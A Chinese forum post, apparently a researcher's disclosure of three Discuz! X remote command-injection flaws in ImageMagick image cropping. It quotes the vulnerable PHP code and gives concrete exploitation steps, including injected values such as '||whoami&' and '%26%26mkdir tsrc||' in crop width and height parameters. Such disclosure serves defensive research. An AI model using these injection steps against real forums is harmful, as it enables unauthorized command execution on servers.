阅读:2497回复:0
DiscuzX系列命令执行分析公开(三连弹)
◆0 漏洞概要
昨天360补天发了这样的一条微博: 然后打听了一下细节,发现居然是我13年7月报给TSRC的漏洞,看今天大家玩的挺开心,与TSRC的人聊了两句,说这个系列可以发几个了,所以我也来凑个热闹,把原来的分析发出来给大家看一下(这里做个广告,TSRC提交Discuz的漏洞,奖品棒棒哒~~)。这个漏洞原来我是作为前台命令执行发个TSRC的,虽然有限制,但是个人感觉还是不错的。只发一个怕各位不过瘾,就再来一发这个点比较直观的后台命令执行和绕过前台命令执行的修复。原TSRC上的漏洞标题是《Discuz! X系列远程命令执行漏洞(二)》、《Discuz! X系列远程命令执行漏洞(三)》和《Discuz! X系列远程命令执行漏洞(四)》。 下面是原漏洞报告的概要部分: “腾讯旗下Discuz! X系列cms存在远程命令执行漏洞,经测试在其2013年6月20日发布的最新版本的Discuz! X3中仍存在此问题。目前这个漏洞尚未在网络中流传,属于0day漏洞。 这个漏洞存在于图片裁剪功能中,需要管理员启用ImageMagick上传图片功能方可触发。此漏洞只需一个可访问论坛内容的账号,即可利用。”◆1 原理分析 0. 一定条件下前台命令执行 这个漏洞出现在sourceclassclass_image.php文件中的Thumb_IM()函数,问题代码如下: #!phpfunction Thumb_IM() { switch($this->param['thumbtype']) { case 'fixnone': case 1: if($this->imginfo['width'] > $this->param['thumbwidth'] || $this->imginfo['height'] > $this->param['thumbheight']) { $exec_str = $this->param['imageimpath'].'/convert -quality '.intval($this->param['thumbquality']).' -geometry '.$this->param['thumbwidth'].'x'.$this->param['thumbheight'].' '.$this->source.' '.$this->target; $return = exec($exec_str); if(!file_exists($this->target)) { return -3; } } break;//省略部分代码从第一行红色代码中可以看出,程序通过一些变量的拼接形成一条系统命令,在第二行使用exec方法进行执行。若用户可以控制这些变量中的任何一个,那么就可能导致任意命令的执行。 1. 同点后台命令执行 这个漏洞出现在sourceclassclass_image.php文件中的Thumb_IM()函数,问题代码如下: #!phpfunction Thumb_IM() { switch($this->param['thumbtype']) { case 'fixnone': case 1: if($this->imginfo['width'] > $this->param['thumbwidth'] || $this->imginfo['height'] > $this->param['thumbheight']) { $exec_str = $this->param['imageimpath'].'/convert -quality '.intval($this->param['thumbquality']).' -geometry '.$this->param['thumbwidth'].'x'.$this->param['thumbheight'].' '.$this->source.' '.$this->target; $return = exec($exec_str); if(!file_exists($this->target)) { return -3; } } break;//省略部分代码从第一行红色代码中可以看出,程序通过一些变量的拼接形成一条系统命令,在第二行使用exec方法进行执行。若用户可以控制这些变量中的任何一个,那么就可能导致任意命令的执行。 由于之前的《2013-07-24@Discuz! X系列远程命令执行漏洞分析(二)》报告中提到过这个问题,也已经提交给腾讯修复了,使用的利用点是param['thumbwidth']和param[' thumbheight']。而这次我使用到param['imageimpath']这个参数,这个参数对应的是后台配置中的“ImageMagick程序安装路径”。 这个利用点应该是最后一个可控点了,因为param['thumbwidth']和param[' thumbheight']在提交给腾讯后添加了整形校验转换,无法传递字符串。而source和target需要在前面进行文件和文件是否存在的验证,无法自由发挥☹。 下面来看一下传递param['imageimpath']这个参数的代码,它的位置在sourceadmincpadmincp_checktools.php文件中: #!php$settingnew = $_GET['settingnew']; if(!empty($_GET['previewthumb'])) { $_G['setting']['imagelib'] = $settingnew['imagelib']; $_G['setting']['imageimpath'] = $settingnew['imageimpath']; $_G['setting']['thumbwidth'] = $settingnew['thumbwidth']; $_G['setting']['thumbheight'] = $settingnew['thumbheight']; $_G['setting']['thumbquality'] = $settingnew['thumbquality']; require_once libfile('class/image'); @unlink(DISCUZ_ROOT.$_G['setting']['attachdir'].'./temp/watermark_temp1.jpg'); @unlink(DISCUZ_ROOT.$_G['setting']['attachdir'].'./temp/watermark_temp2.jpg'); $image = new image;//省略部分代码可以从红色代码出看到imageimpath参数没有进行任何过滤,便传入到全局变量中了。在后面的image类中使用它也是直接从全局变量中提取,没有做任何的过滤和校验,下面是image类的构造函数代码: #!phpfunction image() { global $_G; $this->param = array( 'imagelib' => $_G['setting']['imagelib'], 'imageimpath' => $_G['setting']['imageimpath'], 'thumbquality' => $_G['setting']['thumbquality'], 'watermarkstatus' => dunserialize($_G['setting']['watermarkstatus']), 'watermarkminwidth' => dunserialize($_G['setting']['watermarkminwidth']), 'watermarkminheight' => dunserialize($_G['setting']['watermarkminheight']), 'watermarktype' => $_G['setting']['watermarktype'], 'watermarktext' => $_G['setting']['watermarktext'], 'watermarktrans' => dunserialize($_G['setting']['watermarktrans']), 'watermarkquality' => dunserialize($_G['setting']['watermarkquality']), );}2. 前台命令执行修复绕过 在我之前的《2013-07-24@Discuz! X系列远程命令执行漏洞分析(二)》和《2013-07-24@Discuz! X系列远程命令执行漏洞分析(三)》两篇报告中,将视角盯死在了Thumb_IM这个方法上。在修复后,这个方法的命令执行失败,导致利用后续操作停止。 但是如果让这个方法正常完成它的工作,那么他后面的操作中还是有很多修复中没有考虑到的利用点。下面我们来看下其中的一个利用点,source/class/class_image.php中的Cropper_IM方法: #!phpfunction Cropper_IM() { $exec_str = $this->param['imageimpath'].'/convert -quality 100 '. '-crop '.$this->param['srcwidth'].'x'.$this->param['srcheight'].'+'.$this->param['srcx'].'+'.$this->param['srcy'].' '. '-geometry '.$this->param['dstwidth'].'x'.$this->param['dstheight'].' '.$this->source.' '.$this->target; exec($exec_str); if(!file_exists($this->target)) { return -3; }}从上面代码可以看出,这个方法先拼接命令,然后通过exec函数执行。在拼接的过程中很多变量的内容是可控的,而且在到达这个方法之前没有做足够的校验和过滤。从而导致攻击者可以通过传递一些带有命令操作的内容,来达到命令执行的目的。 ◆2 利用思路 0. 一定条件下前台命令执行 看到这个漏洞点后,我就开始尝试通过关键字从源码中寻找调用Thumb_IM函数的地方。搜索到使用此函数的文件很多,但是由于这个函数的前两个参数都是和上传文件的文件名相关,而且discuz对于上传文件名做了随机化命名和后缀白名单处理,所以导致前三个参数为不可控点。 所以这之后我将目标点瞄准到图片宽度和高度这几个点,从中筛选参数未被写死的可控调用。这样我找到了sourcemodulemiscmisc_imgcropper.php文件,之后大量的时间花费在对于这个文件调用的业务逻辑的查找上。 1. 一定条件下前台命令执行 无 2. 前台命令执行修复绕过 漏洞的触发点在source/module/misc/misc_imgcropper.php中,部分代码如下: #!php$cropfile = md5($_GET['cutimg']).'.jpg';$ictype = $_GET['ictype'];if($ictype == 'block') { require_once libfile('function/block'); $block = C::t('common_block')->fetch($_GET['bid']); $cropfile = block_thumbpath($block, array('picflag' => intval($_GET['picflag']), 'pic' => $_GET['cutimg'])); $cutwidth = $block['picwidth']; $cutheight = $block['picheight']; } else { $cutwidth = $_GET['cutwidth']; $cutheight = $_GET['cutheight']; } $top = intval($_GET['cuttop'] < 0 ? 0 : $_GET['cuttop']); $left = intval($_GET['cutleft'] < 0 ? 0 : $_GET['cutleft']); $picwidth = $cutwidth > $_GET['picwidth'] ? $cutwidth : $_GET['picwidth']; $picheight = $cutheight > $_GET['picheight'] ? $cutheight : $_GET['picheight']; require_once libfile('class/image'); $image = new image(); $prefix = $_GET['picflag'] == 2 ? $_G['setting']['ftp']['attachurl'] : $_G['setting']['attachurl']; if(!$image->Thumb($prefix.$_GET['cutimg'], $cropfile, $picwidth, $picheight)) { showmessage('imagepreview_errorcode_'.$image->errorcode, null, null, array('showdialog' => true, 'closetime' => true)); } $image->Cropper($image->target, $cropfile, $cutwidth, $cutheight, $left, $top); showmessage('do_success', dreferer(), array('icurl' => $cropfile), array('showdialog' => true, 'closetime' => true));}可以看到在最后调用了$image对象的Cropper方法,而这个过程中$cutwidth和$cutheight都是用户可控的变量,并且在执行到Cropper方法前没有进行过任何校验和过滤。 ◆3 技术验证 0. 一定条件下前台命令执行 在管理员开启ImageMagick上传图片功能的前提下,攻击者只需要一个普通用户权限即可,后台设置方法如下图: 由于这个功能是对图片进行处理的,所以,要在访问时提供一个本站有效的图片地址。而且最好是存放在data/attachment目录下的,因为默认就是这个目录,否则就要用“../”来修改路径。 所以我的访问路径为: http://localhost/Discuz_X3.0/upload/misc.php?mod=imgcropper&img=group/19/group_36_banner.jpg然后使用chrome审查元素功能,修改picwidth的value为“||whoami&”,如下图所示: 图片:2015011510473133001image005.jpg 然后点击网页右下角的裁剪按钮就触发了。为了能直观显示,我添加了一行代码将接受执行结果的$return变量,echo出来并exit来结束掉后面的语句,效果如下图所示: 1. 同点后台命令执行 在后台全局->上传设置->ImageMagick 程序安装路径 由于这个功能是对图片进行处理的,所以,要在访问时提供一个本站有效的图片地址。而且最好是存放在data/attachment目录下的,因为默认就是这个目录,否则就要用“../”来修改路径。 所以我的访问路径为 http://192.168.188.142/DiscuzX3.1_1122/upload/misc.php?mod=imgcropper&img=forum/201312/05/094746ub04zw03jr4wi44m.jpg然后直接点击左下角的裁剪,虽然会返回图片访问错误,但是命令却正常执行了,如下图所示: 图片:2015011510473133001image005.jpg 2. ImageMagick 这个漏洞需要在后台开启ImageMagick功能,并确保ImageMagick功能正常运行。下图是我在后台中开启的这个功能,并填写ImageMagick安装目录。 如果这个功能开启,我们甚至可以在没有账号的情况下,前台完成命令执行的触发。 首先访问裁切图片的这个功能,因为这个漏洞的触发必须要有一张有效图片,所以我们可以在论坛帖子中随便找到一张图片来引用。例如:我的发帖图片是: http://192.168.188.143/discuz20140604/data/attachment/forum/201406/13/155944d557e0dtcdpouoad.jpg那么我要访问的裁切功能的URL为: http://192.168.188.143/discuz20140604/misc.php?mod=imgcropper&img=forum/201406/13/155944d557e0dtcdpouoad.jpg然后修改POST数据包中cutheight或者cutwidth中的内容为“%26%26mkdir tsrc||”提交,就可以在discuz根目录下创建一个tsrc的目录。 修改输入包如下图所示: 图片:2015011510473133001image005.jpg 提交后效果如下图所示: |
|